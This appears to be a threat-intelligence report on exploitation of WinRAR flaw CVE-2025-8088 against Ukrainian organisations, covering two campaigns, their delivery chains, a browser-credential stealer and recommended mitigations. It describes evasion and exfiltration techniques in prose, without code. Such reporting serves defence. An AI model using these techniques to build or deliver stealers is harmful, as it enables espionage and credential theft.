CVE-2025-8088: A Prominent Vulnerability Targeting Ukrainian Organizations
CVE-2025-8088, a critical path traversal vulnerability found in WinRAR, was patched in July 2025. However, it continues to be a significant initial access vector for various intrusion sets focusing on Ukraine. As of April 2026, analyses reveal the existence of at least two distinct campaigns actively exploiting this vulnerability. The first is linked to a compiled-stealer chain, provisionally classified under the name SHADOW-EARTH-066, which has been tracked by CERT-UA as UAC-0226. The second campaign is spearheaded by Earth Dahu, an intrusion set aligned with Russian interests, which employs an HTA-based approach for espionage.
Both attack vectors continue to generate and deploy fresh exploit samples, with Earth Dahu maintaining a high level of activity as this report is being written. The core issue lies in how this vulnerability uses NTFS Alternate Data Streams (ADS) embedded in RAR5 service headers. WinRAR versions prior to 7.13 fail to sufficiently sanitize these elements, allowing crafted archives to masquerade as harmless PDFs while secretly delivering payloads to locations such as the Windows Startup folder or the C:\ProgramData directory. This stealthy execution method ensures that malicious actions can occur during subsequent system logins without any further user interaction.
The allure of exploiting CVE-2025-8088 is heightened by its stealthiness and the pervasive use of WinRAR in numerous Ukrainian organizations, making it an attractive option for espionage and credential theft. The SHADOW-EARTH-066 campaign exhibits rapid operational evolution; initial tactics involved using macro-enabled Excel droppers along with plaintext Telegram for data exfiltration. By 2026, the group had shifted to CVE-2025-8088 for delivery, enhancing its toolkit with an LNK-to-PowerShell loader and an in-memory DLL (identified as result.dll) that can effectively execute rapid credential and document theft before erasing itself from the system.
The payloads dropped by the RAR archives along this attack chain include three ADS components: a Startup LNK file, a highly obfuscated PowerShell loader located in C:\ProgramData, and an encoded dynamic link library (DLL). This loader decodes the DLL and facilitates in-memory loading through direct NT system calls (such as NtAllocateVirtualMemory and NtProtectVirtualMemory), assisting evasion of user-mode API hooks and file-based detection.
Result.dll stands out as a refined iteration of a prior stealer known as GIFTEDCROOK. Designed for the x86-64 architecture and utilizing libcurl, it specifically targets Chromium-based browsers—including a bypass for new Chrome versions—and Firefox, while scanning local documents for thirty-five different file extensions. The malware employs several anti-analysis techniques, such as PEB-walking for API resolution, dual-layer RC4-encrypted string tables, identity-function padding, and PRNG-based delays.
Data exfiltration mechanisms include dual-layer RC4 encryption followed by HTTPS POST requests sent to dedicated command-and-control (C&C) servers. Post-exfiltration, the malware erases its staging artifacts, resulting in minimal forensic footprints left behind. Alarmingly, during one observed campaign, the "From" header was spoofed to resemble a legitimate Ukrainian law enforcement agency, although a DMARC validation check failed due to the absence of a DKIM signature.
Conversely, Earth Dahu operates using a different approach characterized by a script-centric model. Their RAR archives typically drop a single HTA or an obfuscated VBScript downloader that executes via mshta.exe upon user login. These HTA chains frequently load VBScript from attacker-controlled resources, generally proxied through Dynamic DNS services or Cloudflare Workers, and fetch modules for espionage, including loaders for GammaSteel and other malware documented by third-party response teams.
Earth Dahu has consistently employed tactics to impersonate trusted Ukrainian domains, often using HTTP basic-auth notation in C&C URLs. They also distribute counterfeit communications, such as court summons or government correspondence, to lure unsuspecting victims. In some instances, attack chains included an added variation in the path structure to evade detection protocols.
Despite the patch for CVE-2025-8088 being available since July 2025, the vulnerability remains actively exploited. This is largely attributed to WinRAR’s lack of enterprise-level update mechanisms. The absence of Group Policy support, no integration with WSUS/SCCM/Intune, and the absence of auto-updates in many deployments leave a persistent vulnerability in security blind spots. This situation highlights the risk posed by widely used applications that are not regularly updated, as they continue to gather exploitable vulnerabilities.
Other Russia-aligned cyber groups, such as Sandworm, Turla, and Void Rabisu, have also been observed leveraging this vulnerability, which underscores its operational significance within cyber espionage campaigns.
To mitigate the risks associated with CVE-2025-8088, organizations must prioritize several essential actions. They should verify the versions of WinRAR in use and make necessary updates to version 7.13 or later, where the ADS path traversal vulnerability has been fixed. Other recommended protections include blocking common exploitation patterns at mail gateways, implementing application allowlisting, and deploying endpoint detection capable of spotting in-memory loading through NT syscall sequences. Furthermore, organizations should conduct an inventory of third-party utilities and establish centralized patch or compensating controls to address the ongoing vulnerabilities that CVE-2025-8088 presents.